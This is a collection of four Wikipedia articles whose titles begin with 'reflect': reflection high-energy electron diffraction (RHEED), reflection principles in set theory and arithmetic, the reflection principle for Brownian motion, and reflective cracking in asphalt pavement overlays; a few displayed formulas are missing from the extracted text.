Reflection high-energy electron diffraction ( RHEED ) is a technique used to characterize the surface of crystalline materials. RHEED systems gather information only from the surface layer of the sample, which distinguishes RHEED from other materials characterization methods that also rely on diffraction of high-energy electrons . Transmission electron microscopy , another common electron diffraction method samples mainly the bulk of the sample due to the geometry of the system, although in special cases it can provide surface information. Low-energy electron diffraction (LEED) is also surface sensitive, but LEED achieves surface sensitivity through the use of low energy electrons.
A RHEED system requires an electron source (gun), photoluminescent detector screen and a sample with a clean surface, although modern RHEED systems have additional parts to optimize the technique. [ 1 ] [ 2 ] The electron gun generates a beam of electrons which strike the sample at a very small angle relative to the sample surface. Incident electrons diffract from atoms at the surface of the sample, and a small fraction of the diffracted electrons interfere constructively at specific angles and form regular patterns on the detector. The electrons interfere according to the position of atoms on the sample surface, so the diffraction pattern at the detector is a function of the sample surface. Figure 1 shows the most basic setup of a RHEED system.
In the RHEED setup, only atoms at the sample surface contribute to the RHEED pattern. [ 3 ] The glancing angle of incident electrons allows them to escape the bulk of the sample and to reach the detector. Atoms at the sample surface diffract (scatter) the incident electrons due to the wavelike properties of electrons.
The diffracted electrons interfere constructively at specific angles according to the crystal structure and spacing of the atoms at the sample surface and the wavelength of the incident electrons. Some of the electron waves created by constructive interference collide with the detector, creating specific diffraction patterns according to the surface features of the sample. Users characterize the crystallography of the sample surface through analysis of the diffraction patterns. Figure 2 shows a RHEED pattern. Video 1 depicts a metrology instrument recording the RHEED intensity oscillations and deposition rate for process control and analysis.
Two types of diffraction contribute to RHEED patterns. Some incident electrons undergo a single, elastic scattering event at the crystal surface, a process termed kinematic scattering. [ 1 ] Dynamic scattering occurs when electrons undergo multiple diffraction events in the crystal and lose some of their energy due to interactions with the sample. [ 1 ] Users extract non-qualitative data from the kinematically diffracted electrons. These electrons account for the high intensity spots or rings common to RHEED patterns. RHEED users also analyze dynamically scattered electrons with complex techniques and models to gather quantitative information from RHEED patterns. [ 3 ]
RHEED users construct Ewald's spheres to find the crystallographic properties of the sample surface. Ewald's spheres show the allowed diffraction conditions for kinematically scattered electrons in a given RHEED setup. The diffraction pattern at the screen relates to the Ewald's sphere geometry, so RHEED users can directly calculate the reciprocal lattice of the sample with a RHEED pattern, the energy of the incident electrons and the distance from the detector to the sample. The user must relate the geometry and spacing of the spots of a perfect pattern to the Ewald's sphere in order to determine the reciprocal lattice of the sample surface.
The Ewald's sphere analysis is similar to that for bulk crystals, however the reciprocal lattice for the sample differs from that for a 3D material due to the surface sensitivity of the RHEED process. The reciprocal lattices of bulk crystals consist of a set of points in 3D space. However, only the first few layers of the material contribute to the diffraction in RHEED, so there are no diffraction conditions in the dimension perpendicular to the sample surface. Due to the lack of a third diffracting condition, the reciprocal lattice of a crystal surface is a series of infinite rods extending perpendicular to the sample's surface. [ 4 ] These rods originate at the conventional 2D reciprocal lattice points of the sample's surface.
The Ewald's sphere is centered on the sample surface with a radius equal to the magnitude of the wavevector of the incident electrons,
where λ is the electrons' de Broglie wavelength .
Diffraction conditions are satisfied where the rods of reciprocal lattice intersect the Ewald's sphere. Therefore, the magnitude of a vector from the origin of the Ewald's sphere to the intersection of any reciprocal lattice rods is equal in magnitude to that of the incident beam. This is expressed as
| k h l | = | k i | {\displaystyle |k_{hl}|=|k_{i}|} (2)
Here, k hl is the wave vector of the elastically diffracted electrons of the order (hl) at any intersection of reciprocal lattice rods with Ewald's sphere
The projections of the two vectors onto the plane of the sample's surface differ by a reciprocal lattice vector G hl ,
G h l = k h l | | − k i | | {\displaystyle G_{hl}=k_{hl}^{||}-k_{i}^{||}} (3)
Figure 3 shows the construction of the Ewald's sphere and provides examples of the G, k hl and k i vectors.
Many of the reciprocal lattice rods meet the diffraction condition, however the RHEED system is designed such that only the low orders of diffraction are incident on the detector. The RHEED pattern at the detector is a projection only of the k vectors that are within the angular range that contains the detector. The size and position of the detector determine which of the diffracted electrons are within the angular range that reaches the detector, so the geometry of the RHEED pattern can be related back to the geometry of the reciprocal lattice of the sample surface through use of trigonometric relations and the distance from the sample to detector.
The k vectors are labeled such that the vector k00 that forms the smallest angle with the sample surface is called the 0th order beam. [ 3 ] The 0th order beam is also known as the specular beam. Each successive intersection of a rod and the sphere further from the sample surface is labeled as a higher order reflection.
Because of the way the center of the Ewald's sphere is positioned, the specular beam forms the same angle with the substrate as the incident electron beam. The specular point has the greatest intensity on a RHEED pattern and is labeled as the (00) point by convention. [ 3 ] The other points on the RHEED pattern are indexed according to the reflection order they project.
The radius of the Ewald's sphere is much larger than the spacing between reciprocal lattice rods because the incident beam has a very short wavelength due to its high-energy electrons. Rows of reciprocal lattice rods actually intersect the Ewald's sphere as an approximate plane because identical rows of parallel reciprocal lattice rods sit directly in front and behind the single row shown. [ 1 ] Figure 3 shows a cross sectional view of a single row of reciprocal lattice rods filling of the diffraction conditions. The reciprocal lattice rods in Figure 3 show the end on view of these planes, which are perpendicular to the computer screen in the figure.
The intersections of these effective planes with the Ewald's sphere forms circles, called Laue circles. The RHEED pattern is a collection of points on the perimeters of concentric Laue circles around the center point. However, interference effects between the diffracted electrons still yield strong intensities at single points on each Laue circle. Figure 4 shows the intersection of one of these planes with the Ewald's Sphere.
The azimuthal angle affects the geometry and intensity of RHEED patterns. [ 4 ] The azimuthal angle is the angle at which the incident electrons intersect the ordered crystal lattice on the surface of the sample. Most RHEED systems are equipped with a sample holder that can rotate the crystal around an axis perpendicular to the sample surface. RHEED users rotate the sample to optimize the intensity profiles of patterns. Users generally index at least 2 RHEED scans at different azimuth angles for reliable characterization of the crystal's surface structure. [ 4 ] Figure 5 shows a schematic diagram of an electron beam incident on the sample at different azimuth angles.
Users sometimes rotate the sample around an axis perpendicular to the sampling surface during RHEED experiments to create a RHEED pattern called the azimuthal plot. [ 4 ] Rotating the sample changes the intensity of the diffracted beams due to their dependence on the azimuth angle. [ 5 ] RHEED specialists characterize film morphologies by measuring the changes in beam intensity and comparing these changes to theoretical calculations, which can effectively model the dependence of the intensity of diffracted beams on the azimuth angle. [ 5 ]
The dynamically, or inelastically, scattered electrons provide several types of information about the sample as well. The brightness or intensity at a point on the detector depends on dynamic scattering, so all analysis involving the intensity must account for dynamic scattering. [ 1 ] [ 3 ] Some inelastically scattered electrons penetrate the bulk crystal and fulfill Bragg diffraction conditions. These inelastically scattered electrons can reach the detector to yield Kikuchi diffraction patterns, which are useful for calculating diffraction conditions. [ 3 ] Kikuchi patterns are characterized by lines connecting the intense diffraction points on a RHEED pattern. Figure 6 shows a RHEED pattern with visible Kikuchi lines .
The electron gun is one of the most important piece of equipment in a RHEED system. [ 1 ] The gun limits the resolution and testing limits of the system. Tungsten filaments are the primary electron source for the electron gun of most RHEED systems due to the low work function of tungsten. In the typical setup, the tungsten filament is the cathode and a positively biased anode draws electrons from the tip of the tungsten filament. [ 1 ]
The magnitude of the anode bias determines the energy of the incident electrons. The optimal anode bias is dependent upon the type of information desired. At large incident angles, electrons with high energy can penetrate the surface of the sample and degrade the surface sensitivity of the instrument. [ 1 ] However, the dimensions of the Laue zones are proportional to the inverse square of the electron energy meaning that more information is recorded at the detector at higher incident electron energies. [ 1 ] For general surface characterization, the electron gun is operated the range of 10-30 keV. [ 3 ]
In a typical RHEED setup, one magnetic and one electric field focus the incident beam of electrons. [ 1 ] A negatively biased Wehnelt electrode positioned between the cathode filament and anode applies a small electric field, which focuses the electrons as they pass through the anode. An adjustable magnetic lens focuses the electrons onto the sample surface after they pass through the anode. A typical RHEED source has a focal length around 50 cm. [ 3 ] The beam is focused to the smallest possible point at the detector rather than the sample surface so that the diffraction pattern has the best resolution. [ 1 ]
Phosphor screens that exhibit photoluminescence are widely used as detectors. These detectors emit green light from areas where electrons hit their surface and are common to TEM as well. The detector screen is useful for aligning the pattern to an optimal position and intensity. CCD cameras capture the patterns to allow for digital analysis.
The sample surface must be extremely clean for effective RHEED experiments. Contaminants on the sample surface interfere with the electron beam and degrade the quality of the RHEED pattern. RHEED users employ two main techniques to create clean sample surfaces. Small samples can be cleaved in the vacuum chamber prior to RHEED analysis. [ 6 ] The newly exposed, cleaved surface is analyzed. Large samples, or those that are not able to be cleaved prior to RHEED analysis can be coated with a passive oxide layer prior to analysis. [ 6 ] Subsequent heat treatment under the vacuum of the RHEED chamber removes the oxide layer and exposes the clean sample surface.
Because gas molecules diffract electrons and affect the quality of the electron gun, RHEED experiments are performed under vacuum. The RHEED system must operate at a pressure low enough to prevent significant scattering of the electron beams by gas molecules in the chamber. At electron energies of 10 keV, a chamber pressure of 10 −5 mbar or lower is necessary to prevent significant scattering of electrons by the background gas. [ 6 ] In practice, RHEED systems are operated under ultra high vacuums. The chamber pressure is minimized as much as possible in order to optimize the process. The vacuum conditions limit the types of materials and processes that can be monitored in situ with RHEED.
Previous analysis focused only on diffraction from a perfectly flat surface of a crystal surface. However, non-flat surfaces add additional diffraction conditions to RHEED analysis.
Streaked or elongated spots are common to RHEED patterns. As Fig 3 shows, the reciprocal lattice rods with the lowest orders intersect the Ewald sphere at very small angles, so the intersection between the rods and sphere is not a singular point if the sphere and rods have thickness. The incident electron beam diverges and electrons in the beam have a range of energies, so in practice, the Ewald sphere is not infinitely thin as it is theoretically modeled. The reciprocal lattice rods have a finite thickness as well, with their diameters dependent on the quality of the sample surface. Streaks appear in the place of perfect points when broadened rods intersect the Ewald sphere. Diffraction conditions are fulfilled over the entire intersection of the rods with the sphere, yielding elongated points or ‘streaks’ along the vertical axis of the RHEED pattern. In real cases, streaky RHEED patterns indicate a flat sample surface while the broadening of the streaks indicate small area of coherence on the surface.
Surface features and polycrystalline surfaces add complexity or change RHEED patterns from those from perfectly flat surfaces. Growing films, nucleating particles, crystal twinning, grains of varying size and adsorbed species add complicated diffraction conditions to those of a perfect surface. [ 7 ] [ 8 ] Superimposed patterns of the substrate and heterogeneous materials, complex interference patterns and degradation of the resolution are characteristic of complex surfaces or those partially covered with heterogeneous materials.
RHEED is an extremely popular technique for monitoring the growth of thin films. In particular, RHEED is well suited for use with molecular beam epitaxy (MBE), a process used to form high quality, ultrapure thin films under ultrahigh vacuum growth conditions. [ 9 ] The intensities of individual spots on the RHEED pattern fluctuate in a periodic manner as a result of the relative surface coverage of the growing thin film. Figure 8 shows an example of the intensity fluctuating at a single RHEED point during MBE growth.
Each full period corresponds to formation of a single atomic layer thin film. The oscillation period is highly dependent on the material system, electron energy and incident angle, so researchers obtain empirical data to correlate the intensity oscillations and film coverage before using RHEED for monitoring film growth. [ 6 ]
Video 1 depicts a metrology instrument recording the RHEED intensity oscillations and deposition rate for process control and analysis.
Reflection high energy electron diffraction - total reflection angle X-ray spectroscopy is a technique for monitoring the chemical composition of crystals. [ 10 ] RHEED-TRAXS analyzes X-ray spectral lines emitted from a crystal as a result of electrons from a RHEED gun colliding with the surface.
RHEED-TRAXS is preferential to X-ray microanalysis (XMA)(such as EDS and WDS ) because the incidence angle of the electrons on the surface is very small, typically less than 5°. As a result, the electrons do not penetrate deeply into the crystal, meaning the X-ray emission is restricted to the top of the crystal, allowing for real-time, in-situ monitoring of surface stoichiometry.
The experimental setup is fairly simple. Electrons are fired onto a sample causing X-ray emission. These X-rays are then detected using a silicon - lithium Si-Li crystal placed behind beryllium windows, used to maintain vacuum.
MCP-RHEED is a system in which an electron beam is amplified by a micro-channel plate (MCP). This system consists of an electron gun and an MCP equipped with a fluorescent screen opposite to the electron gun. Because of the amplification, the intensity of the electron beam can be decreased by several orders of magnitude and the damage to the samples is diminished. This method is used to observe the growth of insulator crystals such as organic films and alkali halide films, which are easily damaged by electron beams. [ 11 ] | https://en.wikipedia.org/wiki/Reflection_high-energy_electron_diffraction |
In set theory , a branch of mathematics , a reflection principle says that it is possible to find sets that, with respect to any given property, resemble the class of all sets. There are several different forms of the reflection principle depending on exactly what is meant by "resemble". Weak forms of the reflection principle are theorems of ZF set theory due to Montague (1961) , while stronger forms can be new and very powerful axioms for set theory.
The name "reflection principle" comes from the fact that properties of the universe of all sets are "reflected" down to a smaller set.
A naive version of the reflection principle states that "for any property of the universe of all sets we can find a set with the same property". This leads to an immediate contradiction: the universe of all sets contains all sets, but there is no set with the property that it contains all sets. To get useful (and non-contradictory) reflection principles we need to be more careful about what we mean by "property" and what properties we allow.
Reflection principles are associated with attempts to formulate the idea that no one notion, idea, or statement can capture our whole view of the universe of sets . [ 1 ] Kurt Gödel described it as follows: [ 2 ]
The universe of all sets is structurally indefinable. One possible way to make this statement precise is the following: The universe of sets cannot be uniquely characterized (i.e., distinguished from all its initial segments) by any internal structural property of the membership relation in it which is expressible in any logic of finite or transfinite type, including infinitary logics of any cardinal number . This principle may be considered a generalization of the closure principle.
All the principles for setting up the axioms of set theory should be reducible to Ackermann 's principle: The Absolute is unknowable. The strength of this principle increases as we get stronger and stronger systems of set theory. The other principles are only heuristic principles. Hence, the central principle is the reflection principle, which presumably will be understood better as our experience increases. Meanwhile, it helps to separate out more specific principles which either give some additional information or are not yet seen clearly to be derivable from the reflection principle as we understand it now.
Generally I believe that, in the last analysis, every axiom of infinity should be derivable from the (extremely plausible) principle that V is indefinable, where definability is to be taken in [a] more and more generalized and idealized sense.
Georg Cantor expressed similar views on absolute infinity : All cardinality properties are satisfied in this number, in which held by a smaller cardinal.
To find non-contradictory reflection principles we might argue informally as follows. Suppose that we have some collection A of methods for forming sets (for example, taking powersets , subsets , the axiom of replacement , and so on). We can imagine taking all sets obtained by repeatedly applying all these methods, and form these sets into a class X , which can be thought of as a model of some set theory. But in light of this view, V is not be exhaustible by a handful of operations, otherwise it would be easily describable from below, this principle is known as inexhaustibility (of V ). [ 3 ] As a result, V is larger than X . Applying the methods in A to the set X itself would also result in a collection smaller than V , as V is not exhaustible from the image of X under the operations in A . Then we can introduce the following new principle for forming sets: "the collection of all sets obtained from some set by repeatedly applying all methods in the collection A is also a set". After adding this principle to A , V is still not exhaustible by the operations in this new A . This process may be repeated further and further, adding more and more operations to the set A and obtaining larger and larger models X . Each X resembles V in the sense that it shares the property with V of being closed under the operations in A .
We can use this informal argument in two ways. We can try to formalize it in (say) ZF set theory; by doing this we obtain some theorems of ZF set theory, called reflection theorems. Alternatively we can use this argument to motivate introducing new axioms for set theory, such as some axioms asserting existence of large cardinals . [ 3 ]
In trying to formalize the argument for the reflection principle of the previous section in ZF set theory, it turns out to be necessary to add some conditions about the collection of properties A (for example, A might be finite). Doing this produces several closely related "reflection theorems" all of which state that we can find a set that is almost a model of ZFC. In contrast to stronger reflection principles, these are provable in ZFC.
One of the most common reflection principles for ZFC is a theorem schema that can be described as follows: for any formula ϕ ( x 1 , … , x n ) {\displaystyle \phi (x_{1},\ldots ,x_{n})} with parameters, if ϕ ( x 1 , … , x n ) {\displaystyle \phi (x_{1},\ldots ,x_{n})} is true (in the set-theoretic universe V {\displaystyle V} ), then there is a level V α {\displaystyle V_{\alpha }} of the cumulative hierarchy such that V α ⊨ ϕ ( x 1 , … , x n ) {\displaystyle V_{\alpha }\vDash \phi (x_{1},\ldots ,x_{n})} . This is known as the Lévy-Montague reflection principle, [ 4 ] or the Lévy reflection principle, [ 5 ] principally investigated in Lévy (1960) and Montague (1961) . [ 6 ] Another version of this reflection principle says that for any finite number of formulas of ZFC we can find a set V α {\displaystyle V_{\alpha }} in the cumulative hierarchy such that all the formulas in the set are absolute for V α {\displaystyle V_{\alpha }} (which means very roughly that they hold in V α {\displaystyle V_{\alpha }} if and only if they hold in the universe of all sets). So this says that the set V α {\displaystyle V_{\alpha }} resembles the universe of all sets, at least as far as the given finite number of formulas is concerned.
Another reflection principle for ZFC is a theorem schema that can be described as follows: [ 7 ] [ 8 ] Let ϕ {\displaystyle \phi } be a formula with at most free variables x 1 , … , x n {\displaystyle x_{1},\ldots ,x_{n}} . Then ZFC proves that
where ϕ M {\displaystyle \phi ^{M}} denotes the relativization of ϕ {\displaystyle \phi } to M {\displaystyle M} (that is, replacing all quantifiers appearing in ϕ {\displaystyle \phi } of the form ∀ x {\displaystyle \forall x} and ∃ x {\displaystyle \exists x} by ∀ x ∈ M {\displaystyle \forall x{\in }M} and ∃ x ∈ M {\displaystyle \exists x{\in }M} , respectively).
Another form of the reflection principle in ZFC says that for any finite set of axioms of ZFC we can find a countable transitive model satisfying these axioms. (In particular this proves that, unless inconsistent, ZFC is not finitely axiomatizable because if it were it would prove the existence of a model of itself, and hence prove its own consistency, contradicting Gödel's second incompleteness theorem.) This version of the reflection theorem is closely related to the Löwenheim–Skolem theorem .
If κ {\displaystyle \kappa } is a strong inaccessible cardinal , then there is a closed unbounded subset C {\displaystyle C} of κ {\displaystyle \kappa } , such that for every α ∈ C {\displaystyle \alpha \in C} , V α {\displaystyle V_{\alpha }} is an elementary substructure of V κ {\displaystyle V_{\kappa }} .
Reflection principles are connected to and can be used to motivate large cardinal axioms. Reinhardt gives the following examples: [ 9 ]
Paul Bernays used a reflection principle as an axiom for one version of set theory (not Von Neumann–Bernays–Gödel set theory , which is a weaker theory). His reflection principle stated roughly that if A {\displaystyle A} is a class with some property, then one can find a transitive set u {\displaystyle u} such that A ∩ u {\displaystyle A\cap u} has the same property when considered as a subset of the "universe" u {\displaystyle u} . This is quite a powerful axiom and implies the existence of several of the smaller large cardinals , such as inaccessible cardinals . (Roughly speaking, the class of all ordinals in ZFC is an inaccessible cardinal apart from the fact that it is not a set, and the reflection principle can then be used to show that there is a set that has the same property, in other words that is an inaccessible cardinal.) Unfortunately, this cannot be axiomatized directly in ZFC, and a class theory like Morse–Kelley set theory normally has to be used. The consistency of Bernays's reflection principle is implied by the existence of an ω-Erdős cardinal .
More precisely, the axioms of Bernays' class theory are: [ 10 ]
where P {\displaystyle {\mathcal {P}}} denotes the powerset .
According to Akihiro Kanamori , [ 11 ] : 62 in a 1961 paper, Bernays considered the reflection schema
for any formula ϕ {\displaystyle \phi } without x {\displaystyle x} free, where transitive ( x ) {\displaystyle {\text{transitive}}(x)} asserts that x {\displaystyle x} is transitive . Starting with the observation that set parameters a 1 , … , a n {\displaystyle a_{1},\ldots ,a_{n}} can appear in ϕ {\displaystyle \phi } and x {\displaystyle x} can be required to contain them by introducing clauses ∃ y ( a i ∈ y ) {\displaystyle \exists y(a_{i}\in y)} into ϕ {\displaystyle \phi } , Bernays just with this schema established pairing , union , infinity , and replacement , in effect achieving a remarkably economical presentation of ZF .
Some formulations of Ackermann set theory use a reflection principle. Ackermann's axiom states that, for any formula ϕ {\displaystyle \phi } not mentioning V {\displaystyle V} , [ 2 ]
Peter Koellner showed that a general class of reflection principles deemed "intrinsically justified" are either inconsistent or weak, in that they are consistent relative to the Erdös cardinal . [ 12 ] However, there are more powerful reflection principles, which are closely related to the various large cardinal axioms. For almost every known large cardinal axiom there is a known reflection principle that implies it, and conversely all but the most powerful known reflection principles are implied by known large cardinal axioms. [ 10 ] An example of this is the wholeness axiom , [ 13 ] which implies the existence of super- n -huge cardinals for all finite n and its consistency is implied by an I3 rank-into-rank cardinal .
Add an axiom saying that Ord is a Mahlo cardinal — for every closed unbounded class of ordinals C (definable by a formula with parameters), there is a regular ordinal in C . This allows one to derive the existence of strong inaccessible cardinals and much more over any ordinal.
Reflection principles may be considered for theories of arithmetic which are generally much weaker than ZFC.
Let P A {\displaystyle {\mathsf {PA}}} denote Peano arithmetic , and P A k {\displaystyle {\mathsf {PA}}_{k}} denote the set of true sentences in the language of PA that are Σ k {\displaystyle \Sigma _{k}} in the arithmetical hierarchy . Mostowski's reflection theorem is that for each natural number k {\displaystyle k} , P A {\displaystyle PA} proves the consistency of P A k {\displaystyle {\mathsf {PA}}_{k}} . As each set P A k {\displaystyle {\mathsf {PA}}_{k}} is Σ k {\displaystyle \Sigma _{k}} -definable, this must be expressed as a theorem schema. [ 14 ] p. 4 These soundness principles are sometimes referred to as syntactic reflection principles, in contrast to the satisfaction-based varieties mentioned above, which are called semantic reflection principles. [ 15 ] p. 1
The local reflection principle R f n ( T ) {\displaystyle Rfn(T)} for a theory T {\displaystyle T} is the schema that for each sentence ϕ {\displaystyle \phi } of the language of T {\displaystyle T} , P r o v T ( ϕ ) ⟹ ϕ {\displaystyle \mathrm {Prov} _{T}(\phi )\implies \phi } . When R f n Γ ( T ) {\displaystyle Rfn_{\Gamma }(T)} is the restricted version of the principle only considering the ϕ {\displaystyle \phi } in a class of formulas Γ {\displaystyle \Gamma } , C o n ( T ) {\displaystyle \mathrm {Con} (T)} and R f n Π 1 0 ( T ) {\displaystyle Rfn_{\Pi _{1}^{0}}(T)} are equivalent over T {\displaystyle T} . [ 16 ] p. 205
The uniform reflection principle R F N ( T ) {\displaystyle RFN(T)} for a theory T {\displaystyle T} is the schema that for each natural numbers n {\displaystyle n} , ∀ ( ⌜ ϕ ⌝ ∈ Σ n 0 ∪ Π n 0 ) ∀ ( y 0 , … , y m ∈ N ) ( P r T ( ⌜ ϕ ( y 0 , … , y n ) ∗ ⌝ ⟹ T r n ( ⌜ ϕ ( y 0 , … , y n ) ∗ ⌝ ) ) {\displaystyle \forall (\ulcorner \phi \urcorner \in \Sigma _{n}^{0}\cup \Pi _{n}^{0})\forall (y_{0},\ldots ,y_{m}\in \mathbb {N} )(\mathrm {Pr} _{T}(\ulcorner \phi (y_{0},\ldots ,y_{n})^{*}\urcorner \implies \mathrm {Tr} _{n}(\ulcorner \phi (y_{0},\ldots ,y_{n})^{*}\urcorner ))} , where Σ n 0 ∪ Π n 0 {\displaystyle \Sigma _{n}^{0}\cup \Pi _{n}^{0}} is the union of the sets of Gödel-numbers of Σ n 0 {\displaystyle \Sigma _{n}^{0}} and Π n 0 {\displaystyle \Pi _{n}^{0}} formulas, and ϕ ( y 0 , … , y n ) ∗ {\displaystyle \phi (y_{0},\ldots ,y_{n})^{*}} is ϕ {\displaystyle \phi } with its free variables y 0 , … , y m {\displaystyle y_{0},\ldots ,y_{m}} replaced with numerals S … S ⏟ y 0 0 {\displaystyle \underbrace {S\ldots S} _{y_{0}}0} , etc. in the language of Peano arithmetic, and T r n {\displaystyle \mathrm {Tr} _{n}} is the partial truth predicate for Σ n 0 ∪ Π n 0 {\displaystyle \Sigma _{n}^{0}\cup \Pi _{n}^{0}} formulas. [ 16 ] p. 205
For k ≥ 1 {\displaystyle k\geq 1} , a β k {\displaystyle \beta _{k}} -model is a model which has the correct truth values of Π k 1 {\displaystyle \Pi _{k}^{1}} statements, where Π k 1 {\displaystyle \Pi _{k}^{1}} is at the k + 1 {\displaystyle k+1} th level of the analytical hierarchy . A countable β k {\displaystyle \beta _{k}} -model of a subsystem of second-order arithmetic consists of a countable set of sets of natural numbers, which may be encoded as a subset of N {\displaystyle \mathbb {N} } . The theory Π 1 1 − C A 0 {\displaystyle \Pi _{1}^{1}{\mathsf {-CA}}_{0}} proves the existence of a β 1 {\displaystyle \beta _{1}} -model, also known as a β {\displaystyle \beta } -model. [ 17 ] Theorem VII.2.16
The β k {\displaystyle \beta _{k}} -model reflection principle for Σ n 1 {\displaystyle \Sigma _{n}^{1}} formulas states that for any Σ n 1 {\displaystyle \Sigma _{n}^{1}} formula θ ( X ) {\displaystyle \theta (X)} with X {\displaystyle X} as its only free set variable, for all X ⊆ N {\displaystyle X\subseteq \mathbb {N} } , if θ ( X ) {\displaystyle \theta (X)} holds, then there is a countable coded β k {\displaystyle \beta _{k}} -model M {\displaystyle M} where X ∈ M {\displaystyle X\in M} such that M ⊨ θ ( X ) {\displaystyle M\vDash \theta (X)} . An extension Σ k 1 − D C 0 {\displaystyle \Sigma _{k}^{1}{\mathsf {-DC}}_{0}} of A C A 0 {\displaystyle {\mathsf {ACA}}_{0}} by a schema of dependent choice is axiomatized. For any 0 ≤ k {\displaystyle 0\leq k} , the system Σ k + 2 1 − D C 0 {\displaystyle \Sigma _{k+2}^{1}{\mathsf {-DC}}_{0}} is equivalent to β k + 1 {\displaystyle \beta _{k+1}} -reflection for Σ k + 4 1 {\displaystyle \Sigma _{k+4}^{1}} formulas. [ 17 ] Theorem VII.7.6
β {\displaystyle \beta } -model reflection has connections to set-theoretic reflection, for example over the weak set theory KP , adding the schema of reflection of Π n {\displaystyle \Pi _{n}} -formulas to transitive sets ( ϕ ⟹ ∃ z ( transitive ( z ) ∧ ϕ z ) {\displaystyle \phi \implies \exists z({\textrm {transitive}}(z)\land \phi ^{z})} for all Π n {\displaystyle \Pi _{n}} formulas ϕ {\displaystyle \phi } ) yields the same Π 4 1 {\displaystyle \Pi _{4}^{1}} -consequeneces as A C A + B I {\displaystyle {\mathsf {ACA+BI}}} plus a schema of β {\displaystyle \beta } -model reflection for Π n + 1 1 {\displaystyle \Pi _{n+1}^{1}} formulas. [ 18 ] | https://en.wikipedia.org/wiki/Reflection_principle |
In the theory of probability for stochastic processes , the reflection principle for a Wiener process states that if the path of a Wiener process f ( t ) reaches a value f ( s ) = a at time t = s , then the subsequent path after time s has the same distribution as the reflection of the subsequent path about the value a . [ 1 ] More formally, the reflection principle refers to a theorem concerning the distribution of the supremum of the Wiener process, or Brownian motion. The result relates the distribution of the supremum of Brownian motion up to time t to the distribution of the process at time t . It is a corollary of the strong Markov property of Brownian motion.
If ( W ( t ) : t ≥ 0 ) {\displaystyle (W(t):t\geq 0)} is a Wiener process, and a > 0 {\displaystyle a>0} is a threshold (also called a crossing point), then the theorem states:
Assuming W ( 0 ) = 0 {\displaystyle W(0)=0} , due to the continuity of Wiener processes, each path (one sampled realization) of Wiener process on ( 0 , t ) {\displaystyle (0,t)} which finishes at or above value/level/threshold/crossing point a {\displaystyle a} the time t {\displaystyle t} ( W ( t ) ≥ a {\displaystyle W(t)\geq a} ) must have crossed (reached) a threshold a {\displaystyle a} ( W ( t a ) = a {\displaystyle W(t_{a})=a} ) at some earlier time t a ≤ t {\displaystyle t_{a}\leq t} for the first time . (It can cross level a {\displaystyle a} multiple times on the interval ( 0 , t ) {\displaystyle (0,t)} , we take the earliest.)
For every such path, you can define another path W ′ ( t ) {\displaystyle W'(t)} on ( 0 , t ) {\displaystyle (0,t)} that is reflected or vertically flipped on the sub-interval ( t a , t ) {\displaystyle (t_{a},t)} symmetrically around level a {\displaystyle a} from the original path. These reflected paths are also samples of the Wiener process reaching value W ′ ( t a ) = a {\displaystyle W'(t_{a})=a} on the interval ( 0 , t ) {\displaystyle (0,t)} , but finish below a {\displaystyle a} . Thus, of all the paths that reach a {\displaystyle a} on the interval ( 0 , t ) {\displaystyle (0,t)} , half will finish below a {\displaystyle a} , and half will finish above. Hence, the probability of finishing above a {\displaystyle a} is half that of reaching a {\displaystyle a} .
In a stronger form, the reflection principle says that if τ {\displaystyle \tau } is a stopping time then the reflection of the Wiener process starting at τ {\displaystyle \tau } , denoted ( W τ ( t ) : t ≥ 0 ) {\displaystyle (W^{\tau }(t):t\geq 0)} , is also a Wiener process, where:
and the indicator function χ { t ≤ τ } = { 1 , if t ≤ τ 0 , otherwise {\displaystyle \chi _{\{t\leq \tau \}}={\begin{cases}1,&{\text{if }}t\leq \tau \\0,&{\text{otherwise }}\end{cases}}} and χ { t > τ } {\displaystyle \chi _{\{t>\tau \}}} is defined similarly. The stronger form implies the original theorem by choosing τ = inf { t ≥ 0 : W ( t ) = a } {\displaystyle \tau =\inf \left\{t\geq 0:W(t)=a\right\}} .
The earliest stopping time for reaching crossing point a , τ a := inf { t : W ( t ) = a } {\displaystyle \tau _{a}:=\inf \left\{t:W(t)=a\right\}} , is an almost surely bounded stopping time. Then we can apply the strong Markov property to deduce that a relative path subsequent to τ a {\displaystyle \tau _{a}} , given by X t := W ( t + τ a ) − a {\displaystyle X_{t}:=W(t+\tau _{a})-a} , is also simple Brownian motion independent of F τ a W {\displaystyle {\mathcal {F}}_{\tau _{a}}^{W}} . Then the probability distribution for the last time W ( s ) {\displaystyle W(s)} is at or above the threshold a {\displaystyle a} in the time interval [ 0 , t ] {\displaystyle [0,t]} can be decomposed as
By the tower property for conditional expectations , the second term reduces to:
since X ( t ) {\displaystyle X(t)} is a standard Brownian motion independent of F τ a W {\displaystyle {\mathcal {F}}_{\tau _{a}}^{W}} and has probability 1 / 2 {\displaystyle 1/2} of being less than 0 {\displaystyle 0} . The proof of the theorem is completed by substituting this into the second line of the first equation. [ 2 ]
The reflection principle is often used to simplify distributional properties of Brownian motion. Considering Brownian motion on the restricted interval ( W ( t ) : t ∈ [ 0 , 1 ] ) {\displaystyle (W(t):t\in [0,1])} then the reflection principle allows us to prove that the location of the maxima t max {\displaystyle t_{\text{max}}} , satisfying W ( t max ) = sup 0 ≤ s ≤ 1 W ( s ) {\displaystyle W(t_{\text{max}})=\sup _{0\leq s\leq 1}W(s)} , has the arcsine distribution . This is one of the Lévy arcsine laws . [ 3 ] | https://en.wikipedia.org/wiki/Reflection_principle_(Wiener_process) |
A reflective crack is a type of failure in asphalt pavement, one of the most popular road surface types. Asphalt pavement is impacted by traffic and thermal loading. Due to loading, cracks can appear on pavement surface that can reduce the Pavement Condition Index (PCI) dramatically.
The pavement can be maintained by overlay. Cracks under the overlay can cause stress concentration at the bottom of the overlay. Due to the repeated stress concentration, a crack starts in the overlay that has a similar shape to the crack in the old pavement. This crack is called a "reflective crack". [ 1 ] Reflective cracking can be categorized as one of the distresses in asphalt pavement. [ 2 ] It can affect the general performance and durability of the pavement. A reflective crack can also open a way for water to enter the pavement's body and increase the deterioration rate. [ 3 ] Reflective cracks can also happen in overlays placed on joints or cracks in composite pavements such as concrete pavements. [ 4 ] Another type of road infrastructure, dynamic inductive charging infrastructure , was found to increase the occurrence of reflective cracks in road surfaces. [ 5 ] [ 6 ] | https://en.wikipedia.org/wiki/Reflective_crack |
